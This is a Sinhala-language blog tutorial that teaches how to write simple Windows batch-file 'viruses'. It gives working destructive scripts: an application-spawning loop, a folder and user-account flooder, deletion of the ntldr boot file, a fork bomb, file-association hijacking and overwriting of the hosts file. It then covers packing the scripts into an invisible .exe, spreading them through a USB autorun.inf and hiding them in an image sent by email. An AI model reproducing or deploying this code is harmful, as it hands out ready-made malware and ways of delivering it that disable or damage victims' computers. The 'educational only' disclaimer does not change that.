Art of Creating Viruses

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk. 

නෝට්පැඩ් එක බාවිත කර වයිරසයන් නිර්මාණය කිරීම පිලිබද කලින් පෝස්ට් එකකත් විස්තර කලා. ප්‍රායෝගිකව මේවායේ දැඩි බලපෑමක් නොමැති උනත් වයිරසයක මූලික ක්‍රියාකාරීත්වය හා කේත සටහන් හසුරවන ආකාරයන් පිලිබදව දල අවබෝදයක් ලබාගැනීමට මේ ක්‍රියාකාරම්  ඉවහල් වෙයි. ඉතින් අපි බලමු නෝට්පෑඩ් එක හරහා කේත සටහන් කීපයක් මගින් වයිරසයන් කීපයක් නිර්මාණය කර එය .exe ගොනුවක් බවට පත් කර ඒ .exe ගොනුව පින්තූරයක් තුල සගවන්නේ කොහොමද කියලා. 

මුලින්ම අපි බලමු සරලම කේත කොටසක ක්‍රියාකාරීතවය කොහොමද හා ඒ කේත කොටසම .bat ආකාරයෙන් ක්‍රියාත්මක වන්නේ කොහොමද කියලා. ඔයාලා ඩොස් විවෘත් කරගන්න. Start > Run > cmd මගින් ඩොස් වලට් යන්න පුලුවන්. ඊලගට 'cd desktop' කියන විදානයි මගින් ඔයාලගේ desktop එකට මාරු වෙන්න. ඊලගට පහල විදානයන් ටයිප් කරන්න. රූපය බලන්න. 

md x 

cd x
md y 

  

md කියන්නේ පෝල්ඩරයක් හදන්න බාවිතා කරන විදානය. cd කියන්නේ පෝල්ඩරයකින් මාරු වෙන්න බාවිත කරන විදානය. 

මේ විදානයන් ටිකම අපිට නෝට්පෑඩ් එකක ලියලා එය .bat ආකාරයෙන් සුරක්ශිත කරන්න පුලුවන්. 

දැන් මෙ සුරක්ශිත කල .bat ගොනුව මත ඩබල් ක්ලික් කලාමත් වෙන්නේ අපි මුලින්ම ඩොස් වලින් කරපු දේම තමයි. දැන් ඔයාලට පැහැදිලි ඇති මේ ගැන. ඉතින් මේ ආකාරයෙන් නිර්මාණය කරන්න පුලුවන් .bat  ගොනු කීපයක් කේත සටහන් පහල ආකාරයෙන් දක්වන්න පුලුවන්.

1. Application Bomber

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x 

Application Bomber ගණයට වැටෙන වයිරසයන් වල් මූලික ක්‍රියාකාරීත්වය මේ වගෙයි. මෙහිදී සිදු වන්නේ නම් කර ඇති එක් එක් වැඩසටහන් ඉබේම ක්‍රියාත්මක වෙන එකයි. x කියන සංරචකයෙන් මෙය නොනවත්වාම ක්‍රියාත්මක කරනවා. අවසානයේ පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වෙනවා.. 

2. Folder flooder

@echo off
:x
md %random%
goto x

මෙතනදී සිදුවන්නේත් දිගින් දිගටම පෝල්ඩයරන් නිර්මානය වීමයි. නොනවත්වාම x සංරචකයි නිසා මෙය සිදු වෙනවා. අවසානයේ පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වෙනවා. %random% කියන ස්තානයට 1000 දුන්නොත් ඒ  කියන්නේ කේතය %%1000% ලෙසින් දුන්නම පෝල්ඩර 1000 හැදිලා තමයි නවතින්නෙ. 

3.User account flooder 

@echo off
:x
net user %random% /add
goto x

මේ ආකාරයේ වයිරසයකින් සිදුවන්නේ පරිගණකයට දරාගන්න නොහැකි ප්‍රමාණයෙන් පරිශීලක ගිණුම්  එහෙම නැත්නම් user accounts  දිගින් දිගටම නිර්මාණය කිරීමයි. %random% කියන ස්තානයට  අපිට කැමති අගයක් ලබාදෙන්න් පුලුවන්. ඒ ලබාදෙන අගය අනුව user accounts හැදෙනවා.  

4. Deleting boot files

පරිගණකය බූට් වන්න බාවිත කරන පද්දති ගොනු කීපයෙන් ප්‍රදාන වන්නේ ntldr කියන  ගොනුව.මෙය පවතින්නේ සැගවුන ගොනුවක් විදියටයි. 

ඉතින් මේ ගොනුව මකා දමන්න වයිරසයක් ලියන්න පුලුවන්. කේතය පහල ආකාරයි.

attrib -S -R -H C:\ntldr
del ntldr 

ඉතින් මේ කේතය .bat ගොනුවක් ලෙසින් සුරක්ශිත කර ක්‍රියාත්මක කලාම ntldr ගොනුව මැකිලා යනවා. ඊලගට පරිගනකයට බූට් වෙන්න බැරිව පහල දෝෂ පනිවිඩය දෙනවා. 

5. Fork Bomb

%0|%0 

පරිගණකයේ ක්‍රියාකාරීත්වය අනිසි ආකාරයෙන් ඉහල නන්වන්න මේ කේතය බාවිතා කරන්න පුලුවන්. මේ මගින් පරිගණකයේ මතකය වගේම සකසනයේ දාරිතාවයත් 100% බාවිතා කරන බව පෙන්නනවා පහල රූප බලන්න. වයිරසය ක්‍රියාත්මක වීමට පෙර බාවිතා වන දාරිතාව 13% ලෙසත් වයිරසය ක්‍රියාත්මක කල පසුව 100% ලෙසත් දකින්න පුලුවන්. 

6. Extension Changer

අවවාදයි....! මෙම කේත කොටස බාවිතය බයානකයි. 

@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

මේක නම් පිස්සුවක්. .txt ගොනුවක දිගුව .jpg ආකාරයෙන් මාරු කරන්න පුලුවන්. ඉතින් ඕනේම ගොනුවක දිගුව මේ ආකාරයෙන් මාරු කරගන්න පුලුවන්. පරිගණකයේම සියලුම ගොනු .jpg උනොත්? පිස්සු හැදෙන් නැතුව තියෙයිද? anything කියන තැනට අපිට මාරු කරන්න ඕනේ දිගුව යොදන්න. උදාහරණයක් ලෙස assoc .txt=.jpg ලෙසින්

7. DNS Poisoning

ඔයාලා දන්නවා පරිගණකයේ hosts කියලා ගොනුවක් තියනවා කියලා. එයි බාවිතා කරන්නෙ අන්තර්ජාල සේවාවන් වෙනුවෙන්. ඉතින් මේ හරහා වෙබ් අඩවි වලට පිවිසීම වාරණය කරන්න පුලුවන්. අපි කරන්න හදන්නේ දැනට බාවිත කරන ජනප්‍රිය වෙබ් අඩවි මේ තුලට රිංගවීම. ඉන්පසු පරිගණකය බාවිතා කරන්නා ඒ වෙබ් අඩවි වෙත යන්න උත්සාහා කලාම යන්න බෑ කියලා දෝශ පනිවිඩයක් එනවා.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts 


xxx.xxx.xxx.xxx වෙනුවට  IP address එකත් www.anything.com  වෙනුවට අපිට වාරණය  කල යුතු වෙබ් අඩවි ලිපිනයත් එකතු කරන්න. 

ඉතින් ඒ හදපු වයිරස කේත ලියපු නෝට්පෑඩ් ටික තමයි පහල රූපයේ දක්වලා තියෙන්නේ. 

සැලකිලිමත් වන්න : බොහොමයක් .bat ආකාරයේ ගොනු නූතන ප්‍රති වයිරස් මෘදුකාංග මගින් අදුනාගෙන ඉවත් කරනවා. ඉතින් මේවා ලියලා සුරක්ශිත කරද්දිම ඔයාලගේ ප්‍රතිවයිරස් මෘදුකංගය මගින් වයිරසයක් ඇවිත් කියලා දැන්වුවොත් බය වෙන්න එපා. 

හෝඩුවාවක් : ඕනේම වයිරසයක් DOS මත රදාපවතිනවා 

.bat ආකාරයේ වයිරසයන් වල යම් යම් සීමාවන් තියනවා. 

1.ප්‍රහාරයට ගොදුරුවන්නාට ඉතාමත් පහසුවෙන් මේ .bat ගොනුව නෝට්පෑඩ් මගින් විවෘත කර බැලීමේ හැකියාව් පවතිනවා. 

2.නිරන්තරයෙන් dos මෙහෙයුම් පද්දතිය විවෘත වී මේ කේතයන් ක්‍රියාත්මව වන නිසා ප්‍රහාරයට ගොදුරුවන්නාට  එය නැවැත්විය හැකියි. 

ඉතින් මේ සීමාවන් දෙකෙන් .bat වයිරසය බේරා ගැනීමට අපිට කල හැක්කේ කුමද්ද? කල හැකි එකම දේ මෙය වෙනත් දිගුවට මාරු කරන්න ඕනේ. ඒ කියන්නෙ .bat දිගුව .exe බවට පත් කරන්න ඕනේ. කොහොමද මේක කරන්නේ. ඒවෙනුවෙන් නිර්මාණය කල තෙවන පාර්ශවීය මෘදුකාංගයක් තමයි Batch To Exe coverter කියන්නේ. ඒක පහල ලින්කුවෙන් නොමිලේ බාගත කරගන්න පුලුවන්. 

http://www.ziddu.com/download/13349384/Bat_To_Exe_Converter.rar.html

මේ මෘදුකාංගය බාගත කරගෙන විවෘත කරගන්න. ඊලගට පහල රූපයේ ආකාරයෙන් batch file කියන ස්තානයට .bat ගොනුව තෝරා දෙන්න. Save as කියන ස්තානයට අලුත් .exe ගොනුව සුරක්ශිත විය යුතු ස්තානය ලබා දෙන්න. visibility කියන ස්තානයේ 'Invisible application' ලෙසින් තෝරපුවාම .bat වලදී මෙන්   dos මෙහෙයුම් පද්දතිය විවෘත වීමක් සිදුවන්නේ නෑ. ඉන්පසුව compile ක්ලික් කරන්න. 

හොදයි. ඔන්න අපිට ඉහතින් සදහන් කල කේත කොටසක් සහිත වයිරසයක් අඩංගු .exe ගොනුවක් ලැබුනා. ඉතින් මෙය ක්‍රම කීපයකින් පරිගණක වලට එක් කරන්න පුලුවන්. පෙන් එක හරහා, ඊමේල් මගින් ඉමේජයක සගවා මේවා යවන්න පුලුවන්. 

පෙන් එක මගින් මේ වයිරසයන් යවන්න උත්සාහා කරනවා නම් අපි ඔටෝරන් ගොනුවක් නිර්මාණය කරන්න ඕනේ. නෝට්පෑඩ් එකක් විවෘත කරගන්න. පහත කේත කොටස නිවැරදිව ටයිප් කරන්න.

[autorun]
open=anything.exe
Icon=anything.ico

anything.exe කියන්නේ ඔයාලාගේ වයිරසයේ නම. මෙය ‘autorun.inf’ ලෙසින් සුරක්ශිත කරන්න. මේ ගොනුව හා වයිරස් ගොනුව පෙන් එකට කොපි කරන්න. එවිට පෙන් එක තුල autorun.inf ගොනුව හා වයිරස් ගොනුව අඩංගු විය යුතුයි. 

ඊමේල් මගින් යවන්න නම් මේ .exe ගොනුව ඉමේජයක් තුල සැගවිය යුතුයි. .exe ගොනුවක් ඉමේජයක සගවන ආකාරය මෙතනින් කියවන්න. ඉතින් අවසානයේ සරල වයිරස් ගොනුවක් නිර්මාණය කරන ආකරය ඔයාලා දැනගත්තා. ඒවගේම මහ ලොකු වයිරස් වලත් මූලිකම කේත කොටස් වන්නේ මේවා තමයි. හැබැයි සමහර වයිරසයන් නිර්මාණයි කරන්න තවත් පරිගණක භාෂා උපකාර කරගන්නවා. ඒවා ප්‍රබලතාවයෙන් වැඩි. ඉගෙන ගැනීම වෙනුවෙන් බාවිත කරන්න. අනුන්ට හානියක් කිරීමේ අරමුණින් මේවා කරන්න එපා. සුබ දවසක්...! 

About the author
Eranda Dayawansa

Eranda Dayawansa is a Microsoft Certified ICT Instructor and Blogger from 2008 who loves all Things of Information Technology. He is also the chief editor at his blog – HelpITLanka which shares new exciting and informative discoveries found from surfing the net.